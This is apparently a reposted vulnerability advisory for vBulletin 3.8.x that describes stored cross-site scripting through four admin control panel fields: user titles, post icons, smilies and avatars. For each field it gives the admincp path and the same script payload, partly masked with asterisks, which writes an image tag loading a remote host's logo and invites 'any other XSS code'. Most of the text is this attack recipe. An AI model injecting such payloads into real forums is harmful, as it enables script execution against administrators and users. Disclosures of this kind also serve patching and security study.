vBulletin 3.8.2 adminCP Cross-Site ScriptingR.I.P DrtRp - We miss you---------------------------------------------Original Post at
http://forum.aria-security.com/en/sh...p?p=1179Greetz to Aura & all Aria-Security Mods & MembersThese were all tested on vbulletin 3.8.0 RC2 so other version may be effected.1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
******************.write('
<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')
</script>or any other XSS code.2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.
******************.write('
<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')
</script>3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2. use the following code as title name.
******************.write('
<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')
</script>4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
******************.write('
<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')
</script>
